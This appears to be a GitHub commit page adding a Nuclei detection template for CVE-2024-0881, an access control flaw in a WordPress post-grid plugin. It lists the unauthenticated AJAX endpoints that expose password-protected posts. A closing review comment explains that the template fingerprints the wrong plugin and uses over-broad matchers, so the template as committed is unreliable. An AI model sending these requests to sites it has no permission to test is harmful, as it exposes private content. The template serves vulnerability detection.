Merge pull request #9686 from Kazgangap/block

add cve-2024-0881
patch-2
Ritik Chaddha 2024-05-07 18:50:27 +05:30 committed by GitHub
commit b21ab65e6e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 54 additions and 0 deletions


@ -0,0 +1,54 @@
id: CVE-2024-0881
info:
name: Combo Blocks < 2.2.76 - Improper Access Control
author: Kazgangap
severity: medium
description: |
The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
reference:
- https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0881
classification:
cve-id: CVE-2024-0881
cwe-id: CWE-284
epss-score: 0.00043
epss-percentile: 0.08268
metadata:
verified: true
max-request: 3
publicwww-query: "/wp-content/plugins/user-meta/"
tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure
flow: http(1) && http(2)
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/user-meta/readme.txt'
matchers:
- type: word
internal: true
words:
- 'User Profile Builder'
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '{"html"'
- '"<div class='
- '"pagination":'
condition: and
- type: status
status:
- 200
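Review bot: The http(1) gate fingerprints the wrong plugin: it requests `/wp-content/plugins/user-meta/readme.txt` and matches `User Profile Builder`, and `publicwww-query` uses the same `user-meta` path, while the name and description are about the Combo Blocks / Post Grid plugin. With `flow: http(1) && http(2)` the AJAX check therefore only runs on sites that happen to have that other plugin installed, so affected sites go unreported. Point the path, the word matcher and `publicwww-query` at the affected plugin's own readme, e.g. `{{BaseURL}}/wp-content/plugins/<plugin-slug>/readme.txt` (placeholder; take the slug from the WPScan entry). Separately, the http(2) words (`{"html"`, `"<div class=`, `"pagination":`) look as if they would match any successful response from these actions, patched or not. Consider extracting the `Stable tag` from the readme with an internal regex extractor and adding a dsl matcher such as `compare_versions(version, '< 2.2.76')`, so a hit stays tied to the versions named in the title.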